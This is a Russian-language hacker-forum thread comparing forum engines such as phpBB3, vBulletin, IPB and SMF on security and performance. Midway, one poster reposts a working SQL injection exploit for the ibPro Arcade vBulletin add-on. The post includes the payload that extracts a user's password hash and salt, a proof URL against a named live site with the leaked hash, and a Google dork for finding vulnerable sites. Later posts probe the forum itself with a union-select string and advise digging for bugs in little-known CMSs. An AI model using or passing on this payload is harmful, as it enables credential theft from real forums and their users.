R0 CREW

phpbb3

Не могу найти полной информации по настройке.
Спасибо заранее!

Доки/статьи:
http://bb3x.ru/docs
http://bb3x.ru/articles
http://www.phpbbguru.net/documentation/
http://www.phpbbguru.net/kb/

Безопасность:
http://www.phpbbguru.net/community/topic32321.html
http://www.phpbbguru.net/kb/protect/

phpbb3 довольно сложный в плане настроек прав, сам запарился, а ещё довольно уязвимый, да и нагрузки большие он не держит, видел у китайцев довольно популярны phpwind и discuz, тянут очень нагруженные проекты на ура, из наших могу сказать что вобла 3.x довольна стабильна и безопасна, только с костылями. XenForo и Smf, тоже довольно лёгкие и шустро справляются с нагрузками, вот IPB мертвый слон…

Не сложный, а много функциональный. Что соответственно требует немного больше времени для изучения.

Форум от создателей воблы (vbulletin 3.x). Внешне довольно симпатичный. Функционал не крутил.

Недавно смотрел, очень не понравился. В плане функциональности чувствуешь себя ущербным. Я бы охарактеризовал его “Огрызок”, сугубо мое ИМХО.

То что нет русской поддержки, совершенно не значит, что это мертвый форум. Очень хороший, постоянно развивающийся форум, с поддержкой полезных плюшек (правда за дополнительную плату).

PS: Если бы я сейчас стоял перед выбором vBulletin или IPB, то наверное выбрал бы IPB.

IPB из коробки даже тормозит на слабых машинах, сильно требователен к оперативе
база данных 130+ таблиц, ещё и языковые строки в ней хранится
раньше уважал IPB2 но с выходом 3йки понял что они оборзели, даже отключив совершенно все рюшечки открытие страниц на локалке 1-2 секунды,

по поводу smf он немного ограничен, создавался как “домашний форум”, однако держит базы данных от 500 метров на ура!
phpbb по сравнению с тем же xenforo слишком уж редко обновляется и уже потерял свою популярность из-за застывшего девелопинга.

Для комфортного старта подойдут средние тарифы большинства хостеров. Затем, при повышении аудитории, можно переходить до максимального. Благо, хостинг сейчас дешевый.

кстате вот событие по поводу воблы: Странно, что vbsupport на этот раз не сделали рассылки об уязвимости,
Уязвимость в хаке ibPro Arcade

[0-Day] ibPro Arcade vBulletin Exploit

/arcade.php?act=Arcade&do=stats&comment=a&s_id=[SQLi]

Fetch the password & salt of user ID 1:

/arcade.php?act=Arcade&do=stats&comment=a&s_id=1 AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT CONCAT(password,0x3a,salt) FROM user WHERE id = 1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

proof:

http://www.nohomers.net/arcade.php?act=Arcade&do=stats&comment=a&s_id=1%20AND%20(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT%20CONCAT(password,0x3a,salt)%20FROM%20user%20WHERE%20id%20=%201),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
mySQL error: Duplicate entry '7a4d3244d834397e38b65ef817e62cb4:Q:v)r!oe@KuF:L5@aA91^qyiaTOsC%1' for key 'group_key'

Те, у кого установлен данный хак - снесите, fix’a устраняющего уязвимость пока нет тема на vbulletin.org
http://www.vbulletin.org/forum/showthread.php?t=101554

Сейчас начался повальный взлом форумов, недавно был взломан bormotuhi.нет,
всего сайтов использующих этот хак приблизительно >400 000
https://www.google.ru/search?sugexp=chrome,mod=11&sourceid=chrome&ie=UTF-8&q=%2Farcade.php%3Fact%3DArcade+Powered+by+vBulletin
Гугл находит 233 000

А на каком движке этот уютный форум.
И как ты заставил гугал искать по движку?
п.с. откуда берешь уязвимости.

Неожидал такой бурной рубки, спасибо ребята.

whiteshuk: да мне ребята накидали тут интересных ресов, вот и нахожу:)
у гугла есть вообще много интересных правил поиска, вот немного: http://jbhelp.ru/topic/156-google-hacks/

Ладно, надеюсь никто не обидется.
Я так понимаю это заплатка? http://forum.reverse4you.org/index.php?cat=-50%20union%20select%20all%20group_concat
Раньше там была уязвимость, или как?

Никакой уязвимости там нет и не было. Это срабатывает небольшой фильтр.

А что такое фильтр в данном случае, как он работает?

простая проверка на get параметры, не думаю что тут какието самодельные костыли есть, все исправления уязвимостей есть в паблике…
думаю если и искать баги, то не в стандартных файлах воблы, она вся давно леченная перелеченная. вон блог поковыряй может чего и найдется…
хотя не знаю какая квалификация в сфере php у рута, может он маньяк вообще))
часто разрабы модов забывают добавлять банальные проверки на размер полей, а в мускуле если будет переполнение поля будет выдаваться ошибочка которую можно потом раскрутить…

Кого посоветуешь почитать по теме?

я не силён в построении инъекций… по форумам там до сям читаю…

Может попробуем тогда все это как-то систематизировать?

что значит систематизировать? - это и есть програмирование, изучай мускул, php, node, ruby
только знающий как это работает сможет найти ошибку в работе другого,
мой совет - ковыряй малоизвестные cms…